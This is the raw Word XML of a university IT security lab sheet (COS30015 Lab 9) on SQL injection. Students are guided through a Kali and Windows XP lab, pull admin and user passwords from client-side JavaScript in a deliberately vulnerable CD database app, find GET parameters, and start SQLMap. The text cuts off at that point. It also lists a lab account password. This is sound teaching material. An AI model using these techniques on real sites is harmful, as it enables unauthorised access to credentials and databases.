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CC43E" w14:textId="77777777" w:rsidR="009F5E05" w:rsidRDefault="00000000" w:rsidP="0055279C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="062AE9FF">
          <v:roundrect id="_x0000_s2105" style="position:absolute;margin-left:303.7pt;margin-top:-12.5pt;width:180.25pt;height:92.75pt;z-index:1" arcsize="10923f">
            <v:textbox>
              <w:txbxContent>
                <w:p w14:paraId="6308978B" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
                  <w:r>
                    <w:t>You will need:</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="5BAAAC7A" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRPr="00040165" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
                  <w:pPr>
                    <w:rPr>
                      <w:color w:val="385623"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="385623"/>
                    </w:rPr>
                    <w:t>Kali</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00040165">
                    <w:rPr>
                      <w:color w:val="385623"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> (VM)</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="3DA79D43" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRPr="00591ADC" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
                  <w:pPr>
                    <w:rPr>
                      <w:color w:val="FF0000"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00591ADC">
                    <w:rPr>
                      <w:color w:val="FF0000"/>
                    </w:rPr>
                    <w:t xml:space="preserve">Windows XP </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="FF0000"/>
                    </w:rPr>
                    <w:t xml:space="preserve">Control </w:t>
                  </w:r>
                  <w:r w:rsidRPr="00591ADC">
                    <w:rPr>
                      <w:color w:val="FF0000"/>
                    </w:rPr>
                    <w:t>(VM)</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="6248DE1E" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRPr="00416113" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
                  <w:pPr>
                    <w:rPr>
                      <w:color w:val="385623"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00416113">
                    <w:rPr>
                      <w:color w:val="385623"/>
                    </w:rPr>
                    <w:t>A computer with internet access</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
          </v:roundrect>
        </w:pict>
      </w:r>
      <w:r w:rsidR="009F5E05">
        <w:t>COS30015 IT SECURITY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C216061" w14:textId="31EDE419" w:rsidR="0055279C" w:rsidRDefault="0055279C" w:rsidP="0055279C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00A663AD">
        <w:t>Lab</w:t>
      </w:r>
      <w:r w:rsidR="005E3CC4">
        <w:t>9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377B4B9F" w14:textId="77777777" w:rsidR="0055279C" w:rsidRDefault="0055279C" w:rsidP="0055279C"/>
    <w:p w14:paraId="1010D933" w14:textId="77777777" w:rsidR="0055279C" w:rsidRDefault="0055279C" w:rsidP="0055279C">
      <w:r>
        <w:t>In this lab you will experiment with SQL injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7169231C" w14:textId="77777777" w:rsidR="0055279C" w:rsidRDefault="0055279C" w:rsidP="0055279C"/>
    <w:p w14:paraId="6974E21B" w14:textId="77777777" w:rsidR="0055279C" w:rsidRDefault="0055279C" w:rsidP="0055279C">
      <w:r>
        <w:t xml:space="preserve">1. Using </w:t>
      </w:r>
      <w:r w:rsidR="00E12339">
        <w:t>VMware Workstation Pro</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, start up the </w:t>
      </w:r>
      <w:r w:rsidR="00563BD6">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4413063E" w14:textId="77777777" w:rsidR="0055279C" w:rsidRDefault="0055279C" w:rsidP="0055279C">
      <w:r>
        <w:t xml:space="preserve">Also start up the </w:t>
      </w:r>
      <w:r w:rsidR="00432DF2" w:rsidRPr="00432DF2">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Windows XP </w:t>
      </w:r>
      <w:r w:rsidR="00563BD6">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>Control</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E34999" w14:textId="77777777" w:rsidR="0055279C" w:rsidRDefault="0055279C" w:rsidP="0055279C"/>
    <w:p w14:paraId="328B3A97" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="0055279C" w:rsidP="0055279C">
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidR="00563BD6">
        <w:t>Log into Kali:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22537BB0" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRPr="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="0055279C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00563BD6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BCD7B1" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRPr="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00563BD6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
        </w:rPr>
        <w:t>COS30015user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22AB8974" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6"/>
    <w:p w14:paraId="29C4ED33" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:r>
        <w:t>Add the XP Control domain (and others) to the hosts file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CC9100" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6"/>
    <w:p w14:paraId="7CE36DCF" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRPr="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00563BD6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
        </w:rPr>
        <w:t>sudo vi /etc/hosts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00F65BAA">
        <w:rPr>
          <w:color w:val="385623"/>
        </w:rPr>
        <w:t>//enter the password:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F65BAA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="385623"/>
        </w:rPr>
        <w:t xml:space="preserve"> COS30015user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF8A2FA" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6"/>
    <w:p w14:paraId="4C911647" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:r>
        <w:t>&lt;insert&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75108A3D" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRPr="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00563BD6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
        </w:rPr>
        <w:t>192.168.100.104 www.server.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16944E4F" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRPr="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00563BD6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
        </w:rPr>
        <w:t>192.168.100.103 www.control.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528CE1D3" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRPr="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00563BD6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
        </w:rPr>
        <w:t>192.168.100.130 www.victim.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C02D2E" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6"/>
    <w:p w14:paraId="4491E2CD" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00563BD6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
        </w:rPr>
        <w:t>:wq</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB6A8F2" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="197C078F" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRPr="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563BD6">
        <w:t>Start up WindowsXP Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463AC2E7" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRPr="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5753FC78" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:r>
        <w:t>On the desktop, open XAMPP Control Panel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C097EA8" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:r w:rsidRPr="00563BD6">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Start</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Apache and MySQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234CBE90" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6"/>
    <w:p w14:paraId="52375162" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:r>
        <w:t xml:space="preserve">Back in Kali, open the browser and go to </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="006C30B7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>www.control.com:88</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3A09D9" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:r>
        <w:t xml:space="preserve">There are some vulnerable web applications here. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60989D3A" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6"/>
    <w:p w14:paraId="59D49A47" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6"/>
    <w:p w14:paraId="4C2F7853" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:r>
        <w:t xml:space="preserve">Have a look at the </w:t>
      </w:r>
      <w:r w:rsidRPr="00563BD6">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CD collection database</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5427DC85" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:r>
        <w:t xml:space="preserve">It has a back door - the keypad. This is implemented in javascript, which means that all you need to know will be available on the client side, through the browser. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1843C864" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6"/>
    <w:p w14:paraId="7B6B5148" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">View the source of the web page. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1A36C2" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Right-click and select </w:t>
      </w:r>
      <w:r w:rsidRPr="00563BD6">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>View Page Source</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB39735" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:r>
        <w:t xml:space="preserve">In the head section, some javascript is loaded into the page. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BC80DC" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRPr="00F65BAA" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="385623"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F65BAA">
        <w:rPr>
          <w:b/>
          <w:color w:val="385623"/>
        </w:rPr>
        <w:t>What is the source (hint: src=)?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A818AA" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00000000" w:rsidP="00563BD6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="375F9ABA">
          <v:rect id="_x0000_s2106" style="position:absolute;margin-left:1pt;margin-top:10.1pt;width:413.55pt;height:31.7pt;z-index:2;mso-position-vertical-relative:line">
            <v:textbox>
              <w:txbxContent>
                <w:p w14:paraId="1E3A97F8" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6"/>
              </w:txbxContent>
            </v:textbox>
          </v:rect>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C71A0F" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6"/>
    <w:p w14:paraId="693F854B" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6"/>
    <w:p w14:paraId="44E971E7" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6"/>
    <w:p w14:paraId="4AC374B9" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:r>
        <w:t xml:space="preserve">Add this resource to the url </w:t>
      </w:r>
      <w:r w:rsidR="006513B8">
        <w:t xml:space="preserve">(www.control.com:88/banner.gif) </w:t>
      </w:r>
      <w:r>
        <w:t>in the browser and load "banner.gif"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4761B3D3" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6"/>
    <w:p w14:paraId="0A3C7E99" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRPr="006513B8" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="385623"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Can't view it? That's alright. Right-click and save it to the desktop. </w:t>
      </w:r>
      <w:r w:rsidR="006513B8">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="006513B8" w:rsidRPr="006513B8">
        <w:rPr>
          <w:b/>
          <w:color w:val="385623"/>
        </w:rPr>
        <w:t>//or File/Save Page As…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD157FF" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:r>
        <w:t>On the desktop (shrink the other windows to reveal it), right-click and "</w:t>
      </w:r>
      <w:r w:rsidRPr="00563BD6">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Open with Other Application</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">". </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7329B61D" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:r>
        <w:t xml:space="preserve">Select </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223C66A1" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00563BD6">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Show other applications</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">" and select </w:t>
      </w:r>
      <w:r w:rsidRPr="00563BD6">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Leafpad</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (a text editor). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0239FE24" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00000000" w:rsidP="00563BD6">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="385623"/>
        </w:rPr>
        <w:pict w14:anchorId="69BFA929">
          <v:rect id="_x0000_s2107" style="position:absolute;margin-left:162.3pt;margin-top:12.5pt;width:272.85pt;height:53.6pt;z-index:3;mso-position-vertical-relative:line">
            <v:textbox>
              <w:txbxContent>
                <w:p w14:paraId="0DC25A16" w14:textId="77777777" w:rsidR="003B6ACD" w:rsidRDefault="003B6ACD" w:rsidP="003B6ACD"/>
              </w:txbxContent>
            </v:textbox>
          </v:rect>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D761C8" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRPr="00F65BAA" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="385623"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F65BAA">
        <w:rPr>
          <w:b/>
          <w:color w:val="385623"/>
        </w:rPr>
        <w:t>What is the admin password?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CED9B3" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRPr="00F65BAA" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="385623"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F65BAA">
        <w:rPr>
          <w:b/>
          <w:color w:val="385623"/>
        </w:rPr>
        <w:t>What is the user password?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448280A8" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6"/>
    <w:p w14:paraId="5D8E996A" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6"/>
    <w:p w14:paraId="42A05AB7" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="006513B8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In the browser, log in as a user. </w:t>
      </w:r>
      <w:r w:rsidR="006513B8">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="006513B8" w:rsidRPr="006513B8">
        <w:rPr>
          <w:b/>
          <w:color w:val="385623"/>
        </w:rPr>
        <w:t>//from http://www.control.com:88/cdcol/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC4E4D7" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6"/>
    <w:p w14:paraId="488BD516" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:r>
        <w:t>Click around and fin</w:t>
      </w:r>
      <w:r w:rsidR="003B6ACD">
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="006513B8">
        <w:t xml:space="preserve"> a URL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> which loads something (a GET request with a parameter)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377A83AF" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:r>
        <w:t>It will be of the form:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721AB07B" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:r>
        <w:t>http://&lt;host&gt;.&lt;domain&gt;:88&lt;resource&gt;?&lt;key&gt;=&lt;value&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F14BB5" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6"/>
    <w:p w14:paraId="37F21D52" w14:textId="77777777" w:rsidR="003B6ACD" w:rsidRPr="003B6ACD" w:rsidRDefault="003B6ACD" w:rsidP="003B6ACD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="385623"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B6ACD">
        <w:rPr>
          <w:b/>
          <w:color w:val="385623"/>
        </w:rPr>
        <w:t xml:space="preserve">What </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="385623"/>
        </w:rPr>
        <w:t xml:space="preserve">are </w:t>
      </w:r>
      <w:r w:rsidRPr="003B6ACD">
        <w:rPr>
          <w:b/>
          <w:color w:val="385623"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="385623"/>
        </w:rPr>
        <w:t>full URIs?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5B9FF7" w14:textId="77777777" w:rsidR="003B6ACD" w:rsidRDefault="00000000" w:rsidP="00563BD6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="78C970B1">
          <v:rect id="_x0000_s2109" style="position:absolute;margin-left:1.5pt;margin-top:5.95pt;width:444.5pt;height:53.6pt;z-index:4;mso-position-vertical-relative:line">
            <v:textbox>
              <w:txbxContent>
                <w:p w14:paraId="4342B2B1" w14:textId="77777777" w:rsidR="003B6ACD" w:rsidRDefault="003B6ACD" w:rsidP="003B6ACD"/>
              </w:txbxContent>
            </v:textbox>
          </v:rect>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C14A403" w14:textId="77777777" w:rsidR="003B6ACD" w:rsidRDefault="003B6ACD" w:rsidP="00563BD6"/>
    <w:p w14:paraId="3EE50CC3" w14:textId="77777777" w:rsidR="003B6ACD" w:rsidRDefault="003B6ACD" w:rsidP="00563BD6"/>
    <w:p w14:paraId="74277079" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6"/>
    <w:p w14:paraId="2812D7C8" w14:textId="77777777" w:rsidR="003B6ACD" w:rsidRDefault="003B6ACD" w:rsidP="00563BD6"/>
    <w:p w14:paraId="75ECD704" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="003B6ACD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Go Back to the Kali desktop. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A01999C" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6"/>
    <w:p w14:paraId="4A6EB18A" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:r>
        <w:t>From the men</w:t>
      </w:r>
      <w:r w:rsidR="003B6ACD">
        <w:t>u</w:t>
      </w:r>
      <w:r>
        <w:t>, select</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139DD9FF" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRPr="003B6ACD" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:pPr>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B6ACD">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Applications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C0BD77" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRPr="003B6ACD" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:pPr>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B6ACD">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6231500D" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRPr="003B6ACD" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:pPr>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B6ACD">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Top10...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D8EA0D" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRPr="003B6ACD" w:rsidRDefault="00563BD6" w:rsidP="00563BD6">
      <w:pPr>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B6ACD">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>SQLMap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5497BAB4" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="00563BD6" w:rsidP="00563BD6"/>
    <w:p w14:paraId="5BE27E41" w14:textId="77777777" w:rsidR="00563BD6" w:rsidRDefault="003B6ACD" w:rsidP="00563BD6">
      <w:r>
        <w:t>R</w:t>
      </w:r>
